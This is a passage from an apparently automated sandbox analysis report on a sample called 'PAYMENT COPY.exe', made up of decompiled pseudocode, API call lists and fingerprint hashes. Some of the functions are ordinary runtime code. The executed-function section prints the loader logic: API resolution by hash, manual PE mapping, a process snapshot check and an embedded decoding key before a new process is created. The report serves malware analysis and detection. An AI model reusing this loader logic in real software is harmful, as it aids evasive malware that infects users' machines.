						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x920e2053
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










                                                                    0x00405756
                                                                    0x0040575a
                                                                    0x00405761
                                                                    0x00405765
                                                                    0x00405773
                                                                    0x00405789
                                                                    0x0040578d
                                                                    0x004057b6
                                                                    0x004057b8
                                                                    0x004057bc
                                                                    0x004057bf
                                                                    0x004057bf
                                                                    0x004057c5
                                                                    0x004057c7
                                                                    0x00000000
                                                                    0x004057c8
                                                                    0x0040578f
                                                                    0x00405798
                                                                    0x004057a7
                                                                    0x0040579a
                                                                    0x0040579d
                                                                    0x004057a3
                                                                    0x004057a3
                                                                    0x004057ab
                                                                    0x00000000
                                                                    0x004057ad
                                                                    0x004057b0
                                                                    0x004057b2
                                                                    0x00000000
                                                                    0x004057b2
                                                                    0x004057ab
                                                                    0x00405767
                                                                    0x0040576c
                                                                    0x00000000

                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
                                                                    • GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000001.237777605.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000001.00000001.237862989.0000000000414000.00000040.00020000.sdmp Download File
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LibraryLoad$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 3177248105-0
                                                                    • Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                                                                    • Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
                                                                    • Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                                                                    • Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00404320, Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 71%
                                                                    			E00404320(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x412064; // 0xffffffff
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00403ECE(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00404192(_t25, _t31, 0x4132a4);
							E00403E03(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00403E03();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00403E8B(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x412064; // 0xffffffff
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00403ECE(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00404192(_t27, _t32, 0x4132a4);
									E00403E03(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00403E03();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00405878(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00405878(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















                                                                    0x00404320
                                                                    0x00404320
                                                                    0x00404320
                                                                    0x0040432a
                                                                    0x0040432c
                                                                    0x00404331
                                                                    0x00404334
                                                                    0x00404342
                                                                    0x00404349
                                                                    0x0040434e
                                                                    0x00404351
                                                                    0x00404354
                                                                    0x00404366
                                                                    0x0040436b
                                                                    0x0040436d
                                                                    0x00404378
                                                                    0x0040437f
                                                                    0x00404384
                                                                    0x00404387
                                                                    0x00404389
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040436f
                                                                    0x0040436f
                                                                    0x00000000
                                                                    0x0040436f
                                                                    0x00404356
                                                                    0x00404356
                                                                    0x00404357
                                                                    0x00404357
                                                                    0x0040435c
                                                                    0x00404397
                                                                    0x00404398
                                                                    0x0040439e
                                                                    0x004043a3
                                                                    0x004043a6
                                                                    0x004043a7
                                                                    0x004043a8
                                                                    0x004043af
                                                                    0x004043b1
                                                                    0x004043b3
                                                                    0x004043b8
                                                                    0x004043bb
                                                                    0x004043c9
                                                                    0x004043d5
                                                                    0x004043d8
                                                                    0x004043db
                                                                    0x004043ed
                                                                    0x004043f2
                                                                    0x004043f4
                                                                    0x004043ff
                                                                    0x00404405
                                                                    0x0040440d
                                                                    0x0040440f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004043f6
                                                                    0x004043f6
                                                                    0x00000000
                                                                    0x004043f6
                                                                    0x004043dd
                                                                    0x004043dd
                                                                    0x004043de
                                                                    0x004043de
                                                                    0x00404411
                                                                    0x00404412
                                                                    0x00404412
                                                                    0x004043bd
                                                                    0x004043c3
                                                                    0x004043c7
                                                                    0x0040441a
                                                                    0x0040441b
                                                                    0x00404421
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004043c7
                                                                    0x00404428
                                                                    0x00404428
                                                                    0x00404336
                                                                    0x0040433c
                                                                    0x00404340
                                                                    0x0040438b
                                                                    0x0040438c
                                                                    0x00404396
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404340

                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
                                                                    • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
                                                                    • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
                                                                    • _abort.LIBCMT ref: 0040439E
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000001.237777605.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000001.00000001.237862989.0000000000414000.00000040.00020000.sdmp Download File
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast$_abort
                                                                    • String ID:
                                                                    • API String ID: 88804580-0
                                                                    • Opcode ID: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
                                                                    • Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
                                                                    • Opcode Fuzzy Hash: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
                                                                    • Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004025BA, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004025BA() {
				void* _t4;
				void* _t8;

				E00402AE5();
				E00402A79();
				if(E004027D9() != 0) {
					_t4 = E0040278B(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00402815();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





                                                                    0x004025ba
                                                                    0x004025bf
                                                                    0x004025cb
                                                                    0x004025d0
                                                                    0x004025d5
                                                                    0x004025d7
                                                                    0x004025e2
                                                                    0x004025d9
                                                                    0x004025d9
                                                                    0x00000000
                                                                    0x004025d9
                                                                    0x004025cd
                                                                    0x004025cd
                                                                    0x004025cf
                                                                    0x004025cf

                                                                    APIs
                                                                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
                                                                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
                                                                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
                                                                      • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
                                                                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000001.237777605.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000001.00000001.237862989.0000000000414000.00000040.00020000.sdmp Download File
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                    • String ID:
                                                                    • API String ID: 1761009282-0
                                                                    • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                                                    • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
                                                                    • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                                                    • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Analysis Process: PAYMENT COPY.exe PID: 6612 Parent PID: 1104 PAYMENT COPY.exeCOMMON

                                                                    Executed Functions

                                                                    Function 72C33723, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 69%
                                                                    			E72C33723(intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				void* _v16;
				intOrPtr _v20;
				void* _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void* _v76;
				intOrPtr _v80;
				signed char _v84;
				long _v88;
				short _v90;
				short _v92;
				short _v94;
				short _v96;
				short _v98;
				short _v100;
				short _v102;
				short _v104;
				short _v106;
				char _v108;
				short _t141;
				short _t142;
				short _t143;
				short _t144;
				short _t145;
				short _t146;
				short _t147;
				short _t148;
				short _t149;
				int _t165;
				signed int _t169;
				intOrPtr _t175;
				signed int _t195;
				signed int _t210;
				signed int _t222;

				_v24 = _v24 & 0x00000000;
				_v48 = _v48 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t141 = 0x6e;
				_v108 = _t141;
				_t142 = 0x74;
				_v106 = _t142;
				_t143 = 0x64;
				_v104 = _t143;
				_t144 = 0x6c;
				_v102 = _t144;
				_t145 = 0x6c;
				_v100 = _t145;
				_t146 = 0x2e;
				_v98 = _t146;
				_t147 = 0x64;
				_v96 = _t147;
				_t148 = 0x6c;
				_v94 = _t148;
				_t149 = 0x6c;
				_v92 = _t149;
				_v90 = 0;
				_v16 = _v16 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_t23 =  &_v44;
				 *_t23 = _v44 & 0x00000000;
				_t222 =  *_t23;
				_v20 = E72C345A0();
				_v64 = E72C34648(_v20, 0x8a111d91);
				_v68 = E72C34648(_v20, 0x170c1ca1);
				_v52 = E72C34648(_v20, 0xa5f15738);
				_v72 = E72C34648(_v20, 0x433a3842);
				_v56 = E72C34648(_v20, 0xd6eb2188);
				_v60 = E72C34648(_v20, 0x50a26af);
				_v80 = E72C34648(_v20, 0x55e38b1f);
				_v44 = 1;
				while(1) {
					_v16 = CreateFileW(E72C347A3(_t222,  &_v108), 0x80000000, 7, 0, 3, 0x80, 0);
					if(_v16 == 0xffffffff) {
						break;
					}
					_v36 = _v68(_v16, 0);
					__eflags = _v36 - 0xffffffff;
					if(_v36 != 0xffffffff) {
						_v12 = VirtualAlloc(0, _v36, 0x3000, 4);
						__eflags = _v12;
						if(_v12 != 0) {
							_t165 = ReadFile(_v16, _v12, _v36,  &_v88, 0);
							__eflags = _t165;
							if(_t165 != 0) {
								_v76 = _v12;
								_v32 = _v12 +  *((intOrPtr*)(_v76 + 0x3c));
								_t169 =  *(_v32 + 0x14) & 0x0000ffff;
								_t213 = _v32;
								_t68 = _t169 + 0x18; // 0x8000018
								_v40 = _v32 + _t68;
								_v24 = VirtualAlloc(0,  *(_v32 + 0x50), 0x3000, 4);
								__eflags = _v24;
								if(_v24 != 0) {
									E72C345B8(_t213, _v24, _v12,  *((intOrPtr*)(_v32 + 0x54)));
									_v28 = _v28 & 0x00000000;
									while(1) {
										_t175 = _v32;
										__eflags = _v28 - ( *(_t175 + 6) & 0x0000ffff);
										if(_v28 >= ( *(_t175 + 6) & 0x0000ffff)) {
											break;
										}
										E72C345B8(_v40, _v24 +  *((intOrPtr*)(_v40 + 0xc + _v28 * 0x28)), _v12 +  *((intOrPtr*)(_v40 + 0x14 + _v28 * 0x28)),  *((intOrPtr*)(_v40 + 0x10 + _v28 * 0x28)));
										_t210 = _v28 + 1;
										__eflags = _t210;
										_v28 = _t210;
									}
									_v48 = E72C34648(_v24, _a4);
									__eflags = _v48;
									if(_v48 != 0) {
										__eflags = _v16;
										if(_v16 != 0) {
											FindCloseChangeNotification(_v16);
										}
										__eflags = _v12;
										if(_v12 != 0) {
											VirtualFree(_v12, 0, 0x8000);
										}
										_v44 = _v44 & 0x00000000;
										__eflags = 0;
										if(0 != 0) {
											continue;
										}
									} else {
									}
								} else {
								}
							} else {
							}
						} else {
						}
					} else {
					}
					L22:
					if(_v44 != 0) {
						if(_v16 != 0) {
							_v56(_v16);
						}
						_v80(0);
					}
					_v8 = _v48;
					while(1 != 0) {
						if(( *_v8 & 0x000000ff) != 0xb8) {
							__eflags = ( *_v8 & 0x000000ff) - 0xe9;
							if(( *_v8 & 0x000000ff) != 0xe9) {
								__eflags = ( *_v8 & 0x000000ff) - 0xea;
								if(( *_v8 & 0x000000ff) != 0xea) {
									_t195 = _v8 + 1;
									__eflags = _t195;
									_v8 = _t195;
								} else {
									_v8 =  *(_v8 + 1);
								}
							} else {
								_t125 =  *(_v8 + 1) + 5; // 0x5
								_v8 = _v8 + _t125;
							}
							continue;
						} else {
						}
						break;
					}
					_v8 = _v8 + 1;
					_v84 =  *_v8;
					if(_v24 != 0) {
						VirtualFree(_v24, 0, 0x8000);
					}
					return _v84;
				}
				goto L22;
			}

















































                                                                    0x72c33729
                                                                    0x72c3372d
                                                                    0x72c33731
                                                                    0x72c33737
                                                                    0x72c33738
                                                                    0x72c3373e
                                                                    0x72c3373f
                                                                    0x72c33745
                                                                    0x72c33746
                                                                    0x72c3374c
                                                                    0x72c3374d
                                                                    0x72c33753
                                                                    0x72c33754
                                                                    0x72c3375a
                                                                    0x72c3375b
                                                                    0x72c33761
                                                                    0x72c33762
                                                                    0x72c33768
                                                                    0x72c33769
                                                                    0x72c3376f
                                                                    0x72c33770
                                                                    0x72c33776
                                                                    0x72c3377a
                                                                    0x72c3377e
                                                                    0x72c33782
                                                                    0x72c33786
                                                                    0x72c33786
                                                                    0x72c33786
                                                                    0x72c3378f
                                                                    0x72c3379f
                                                                    0x72c337af
                                                                    0x72c337bf
                                                                    0x72c337cf
                                                                    0x72c337df
                                                                    0x72c337ef
                                                                    0x72c337ff
                                                                    0x72c33802
                                                                    0x72c33809
                                                                    0x72c33828
                                                                    0x72c3382f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x72c3383e
                                                                    0x72c33841
                                                                    0x72c33845
                                                                    0x72c3385b
                                                                    0x72c3385e
                                                                    0x72c33862
                                                                    0x72c33878
                                                                    0x72c3387b
                                                                    0x72c3387d
                                                                    0x72c33887
                                                                    0x72c33893
                                                                    0x72c33899
                                                                    0x72c3389d
                                                                    0x72c338a0
                                                                    0x72c338a4
                                                                    0x72c338b9
                                                                    0x72c338bc
                                                                    0x72c338c0
                                                                    0x72c338d3
                                                                    0x72c338d8
                                                                    0x72c338e5
                                                                    0x72c338e5
                                                                    0x72c338ec
                                                                    0x72c338ef
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x72c3391a
                                                                    0x72c338e1
                                                                    0x72c338e1
                                                                    0x72c338e2
                                                                    0x72c338e2
                                                                    0x72c3392c
                                                                    0x72c3392f
                                                                    0x72c33933
                                                                    0x72c33937
                                                                    0x72c3393b
                                                                    0x72c33940
                                                                    0x72c33940
                                                                    0x72c33943
                                                                    0x72c33947
                                                                    0x72c33953
                                                                    0x72c33953
                                                                    0x72c33956
                                                                    0x72c3395a
                                                                    0x72c3395c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x72c33935
                                                                    0x00000000
                                                                    0x72c338c2
                                                                    0x00000000
                                                                    0x72c3387f
                                                                    0x00000000
                                                                    0x72c33864
                                                                    0x00000000
                                                                    0x72c33847
                                                                    0x72c33962
                                                                    0x72c33966
                                                                    0x72c3396c
                                                                    0x72c33971
                                                                    0x72c33971
                                                                    0x72c33976
                                                                    0x72c33976
                                                                    0x72c3397c
                                                                    0x72c3397f
                                                                    0x72c3398f
                                                                    0x72c33999
                                                                    0x72c3399e
                                                                    0x72c339b8
                                                                    0x72c339bd
                                                                    0x72c339cd
                                                                    0x72c339cd
                                                                    0x72c339ce
                                                                    0x72c339bf
                                                                    0x72c339c5
                                                                    0x72c339c5
                                                                    0x72c339a0
                                                                    0x72c339a9
                                                                    0x72c339ad
                                                                    0x72c339ad
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x72c33991
                                                                    0x00000000
                                                                    0x72c3398f
                                                                    0x72c339d7
                                                                    0x72c339df
                                                                    0x72c339e6
                                                                    0x72c339f2
                                                                    0x72c339f2
                                                                    0x72c339fb
                                                                    0x72c339fb
                                                                    0x00000000

                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 72C33825
                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 72C339F2
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.265352593.0000000072C33000.00000040.00020000.sdmp, Offset: 72C30000, based on PE: true
                                                                    • Associated: 00000007.00000002.265268410.0000000072C30000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000007.00000002.265281482.0000000072C31000.00000080.00020000.sdmp Download File
                                                                    • Associated: 00000007.00000002.265307193.0000000072C32000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000007.00000002.265398158.0000000072C35000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CreateFileFreeVirtual
                                                                    • String ID:
                                                                    • API String ID: 204039940-0
                                                                    • Opcode ID: 1a27eacef18cec4e83dd66d6f105d4ce73f2ffecc6ce0885b3943496d180ad0d
                                                                    • Instruction ID: d2235dc38f69927724f60b7cbadbdf22b18443d98127e4fa16a05c2e472010f0
                                                                    • Opcode Fuzzy Hash: 1a27eacef18cec4e83dd66d6f105d4ce73f2ffecc6ce0885b3943496d180ad0d
                                                                    • Instruction Fuzzy Hash: A0A11334E01209EFDF12CFE8C985BADBBB1BF18315F60485AE901BB2A1D3745A51DB52
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 72C342DC, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207filememoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 71%
                                                                    			E72C342DC(void* __ecx, void* __edx, void* __eflags, WCHAR* _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				long _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				signed int _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				char _v140;
				char _v208;
				char _v1248;
				signed int _t124;
				void* _t126;
				void* _t130;
				signed int _t131;
				void* _t132;
				int _t134;
				int _t137;
				signed int _t147;
				void* _t149;
				signed int _t150;
				void* _t152;
				signed int _t153;
				void* _t155;
				void* _t156;
				void* _t157;
				void* _t158;
				void* _t159;

				_t159 = __eflags;
				_t157 = __edx;
				_t156 = __ecx;
				_v20 = _v20 & 0x00000000;
				_v84 = _v84 & 0x00000000;
				_v56 = 0x32;
				_v55 = 0x66;
				_v54 = 0x31;
				_v53 = 0x63;
				_v52 = 0x38;
				_v51 = 0x33;
				_v50 = 0x66;
				_v49 = 0x63;
				_v48 = 0x35;
				_v47 = 0x34;
				_v46 = 0x34;
				_v45 = 0x38;
				_v44 = 0x34;
				_v43 = 0x35;
				_v42 = 0x63;
				_v41 = 0x39;
				_v40 = 0x38;
				_v39 = 0x64;
				_v38 = 0x30;
				_v37 = 0x34;
				_v36 = 0x31;
				_v35 = 0x37;
				_v34 = 0x36;
				_v33 = 0x64;
				_v32 = 0x66;
				_v31 = 0x31;
				_v30 = 0x66;
				_v29 = 0x32;
				_v28 = 0x30;
				_v27 = 0x38;
				_v26 = 0x38;
				_v25 = 0x61;
				_v24 = 0;
				_v16 = _v16 & 0x00000000;
				_v116 = _v116 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_v8 = E72C345A0();
				_v60 = E72C34648(_v8, 0x34cf0bf);
				_v64 = E72C34648(_v8, 0x55e38b1f);
				_v68 = E72C34648(_v8, 0xd1775dc4);
				_v120 = E72C34648(_v8, 0xd6eb2188);
				_v96 = E72C34648(_v8, 0xa2eae210);
				_v124 = E72C34648(_v8, 0xcd8538b2);
				_v72 = E72C34648(_v8, 0x8a111d91);
				_v76 = E72C34648(_v8, 0x170c1ca1);
				_v80 = E72C34648(_v8, 0xa5f15738);
				_v88 = E72C34648(_v8, 0x433a3842);
				_v92 = E72C34648(_v8, 0x2ffe2c64);
				_v112 = 0x2d734193;
				_v108 = 0x63daa681;
				_v104 = 0x26090612;
				_v100 = 0x6f28fae0;
				_t124 = 4;
				_t126 = E72C34239(_t159,  *((intOrPtr*)(_t158 + _t124 * 0 - 0x6c))); // executed
				_t160 = _t126;
				if(_t126 != 0) {
					L4:
					_v60(0x7918);
					L5:
					_v68(0,  &_v1248, 0x103);
					_t130 = CreateFileW(_a4, 0x80000000, 7, 0, 3, 0x80, 0);
					_v20 = _t130;
					if(_v20 != 0xffffffff) {
						_t131 = _v76(_v20, 0);
						_v16 = _t131;
						__eflags = _v16 - 0xffffffff;
						if(_v16 != 0xffffffff) {
							_t132 = VirtualAlloc(0, _v16, 0x3000, 4);
							_v12 = _t132;
							__eflags = _v12;
							if(_v12 != 0) {
								_t134 = ReadFile(_v20, _v12, _v16,  &_v84, 0);
								__eflags = _t134;
								if(_t134 != 0) {
									_t99 =  &_v56; // 0x32
									E72C3403D(_v12, _t99, 0x20);
									_t137 = E72C33034(_t156, _t157, __eflags, _v12); // executed
									__eflags = _t137;
									if(_t137 != 0) {
										_v60(0xbb8);
										E72C33005(_t156,  &_v140, 0x10);
										E72C33005(_t156,  &_v208, 0x44);
										_t137 = _v96( &_v1248, _v92(0, 0, 0, 0x20, 0, 0,  &_v208,  &_v140));
										__eflags = _t137;
										if(_t137 != 0) {
											_t137 = _v64(0);
										}
									}
									ExitProcess(0);
								}
								return _t134;
							}
							return _t132;
						}
						return _t131;
					}
					return _t130;
				}
				_t147 = 4;
				_t149 = E72C34239(_t160,  *((intOrPtr*)(_t158 + (_t147 << 0) - 0x6c))); // executed
				_t161 = _t149;
				if(_t149 != 0) {
					goto L4;
				}
				_t150 = 4;
				_t152 = E72C34239(_t161,  *((intOrPtr*)(_t158 + (_t150 << 1) - 0x6c))); // executed
				_t162 = _t152;
				if(_t152 != 0) {
					goto L4;
				}
				_t153 = 4;
				_t155 = E72C34239(_t162,  *((intOrPtr*)(_t158 + _t153 * 3 - 0x6c))); // executed
				if(_t155 == 0) {
					goto L5;
				}
				goto L4;
			}













































































                                                                    0x72c342dc
                                                                    0x72c342dc
                                                                    0x72c342dc
                                                                    0x72c342e5
                                                                    0x72c342e9
                                                                    0x72c342ed
                                                                    0x72c342f1
                                                                    0x72c342f5
                                                                    0x72c342f9
                                                                    0x72c342fd
                                                                    0x72c34301
                                                                    0x72c34305
                                                                    0x72c34309
                                                                    0x72c3430d
                                                                    0x72c34311
                                                                    0x72c34315
                                                                    0x72c34319
                                                                    0x72c3431d
                                                                    0x72c34321
                                                                    0x72c34325
                                                                    0x72c34329
                                                                    0x72c3432d
                                                                    0x72c34331
                                                                    0x72c34335
                                                                    0x72c34339
                                                                    0x72c3433d
                                                                    0x72c34341
                                                                    0x72c34345
                                                                    0x72c34349
                                                                    0x72c3434d
                                                                    0x72c34351
                                                                    0x72c34355
                                                                    0x72c34359
                                                                    0x72c3435d
                                                                    0x72c34361
                                                                    0x72c34365
                                                                    0x72c34369
                                                                    0x72c3436d
                                                                    0x72c34371
                                                                    0x72c34375
                                                                    0x72c34379
                                                                    0x72c34382
                                                                    0x72c34392
                                                                    0x72c343a2
                                                                    0x72c343b2
                                                                    0x72c343c2
                                                                    0x72c343d2
                                                                    0x72c343e2
                                                                    0x72c343f2
                                                                    0x72c34402
                                                                    0x72c34412
                                                                    0x72c34422
                                                                    0x72c34432
                                                                    0x72c34435
                                                                    0x72c3443c
                                                                    0x72c34443
                                                                    0x72c3444a
                                                                    0x72c34453
                                                                    0x72c3445b
                                                                    0x72c34460
                                                                    0x72c34462
                                                                    0x72c3449c
                                                                    0x72c344a1
                                                                    0x72c344a4
                                                                    0x72c344b2
                                                                    0x72c344ca
                                                                    0x72c344cd
                                                                    0x72c344d4
                                                                    0x72c344e0
                                                                    0x72c344e3
                                                                    0x72c344e6
                                                                    0x72c344ea
                                                                    0x72c344fd
                                                                    0x72c34500
                                                                    0x72c34503
                                                                    0x72c34507
                                                                    0x72c3451d
                                                                    0x72c34520
                                                                    0x72c34522
                                                                    0x72c34528
                                                                    0x72c3452f
                                                                    0x72c34537
                                                                    0x72c3453c
                                                                    0x72c3453e
                                                                    0x72c34545
                                                                    0x72c34551
                                                                    0x72c3455f
                                                                    0x72c34589
                                                                    0x72c3458c
                                                                    0x72c3458e
                                                                    0x72c34592
                                                                    0x72c34592
                                                                    0x72c3458e
                                                                    0x72c34597
                                                                    0x72c34597
                                                                    0x00000000
                                                                    0x72c34522
                                                                    0x00000000
                                                                    0x72c34507
                                                                    0x00000000
                                                                    0x72c344ea
                                                                    0x00000000
                                                                    0x72c344d4
                                                                    0x72c34466
                                                                    0x72c3446e
                                                                    0x72c34473
                                                                    0x72c34475
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x72c34479
                                                                    0x72c34480
                                                                    0x72c34485
                                                                    0x72c34487
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x72c3448b
                                                                    0x72c34493
                                                                    0x72c3449a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000

                                                                    APIs
                                                                      • Part of subcall function 72C34239: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,873D1860,?,5C7BF6E9,?,EA31D3B6), ref: 72C3427E
                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 72C344CA
                                                                      • Part of subcall function 72C34239: Process32FirstW.KERNEL32(000000FF,0000022C), ref: 72C342A2
                                                                    • VirtualAlloc.KERNELBASE(00000000,000000FF,00003000,00000004), ref: 72C344FD
                                                                    • ReadFile.KERNELBASE(000000FF,00000000,000000FF,00000000,00000000), ref: 72C3451D
